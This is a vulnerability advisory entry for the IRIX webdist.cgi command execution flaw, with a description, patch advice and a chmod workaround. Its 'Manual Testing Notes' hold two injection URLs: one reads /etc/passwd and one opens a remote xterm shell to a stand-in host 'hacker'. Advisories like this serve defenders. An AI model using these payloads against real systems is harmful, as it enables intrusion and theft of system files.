IRIX webdist.cgi Arbitrary Command Execution

1997-05-06T00:00:00
ID OSVDB:235
Type osvdb
Reporter OSVDB
Modified 1997-05-06T00:00:00

Description

Vulnerability Description

IRIX contains a flaw that may allow remote command execution. The issue is triggered when a malicious attacker utilizes the Webdist script (webdist.cgi) of the Out Box Environment Subsystem. The remote command execution occurs with the privileges of the httpd daemon. This flaw may lead to a loss of integrity.

Solution Description

Upgrade to version 6.5 or higher, as it has been reported to fix this vulnerability. Also, Silicon Graphics, Inc. has released a patch to address this issue. It is also possible to correct the flaw by implementing the following workaround:

/bin/chmod 400 /var/www/cgi-bin/webdist.cgi

/bin/chmod 400 /var/www/cgi-bin/handler

/bin/chmod 400 /var/www/cgi-bin/wrap

Short Description

IRIX contains a flaw that may allow remote command execution. The issue is triggered when a malicious attacker utilizes the Webdist script (webdist.cgi) of the Out Box Environment Subsystem. The remote command execution occurs with the privileges of the httpd daemon. This flaw may lead to a loss of integrity.

Manual Testing Notes

http://[target]/cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd

http://[target]/webdist.cgi?distloc=;/usr/bin/X11/xterm%20-display%20hacker:0.0%20-ut%20-e%20/bin/sh

References:

Vendor URL: http://www.sgi.com Vendor Specific Solution URL: ftp://patches.sgi.com/support/free/security/patches/ Vendor Specific Advisory URL Vendor Specific Advisory URL Snort Signature ID: 1865 Snort Signature ID: 1147 Snort Signature ID: 1163 Mail List Post: http://marc.theaimsgroup.com/?l=bugtraq&m=87602167420919&w=2 ISS X-Force ID: 333 CVE-1999-0039 CERT: CA-1997-12 Bugtraq ID: 374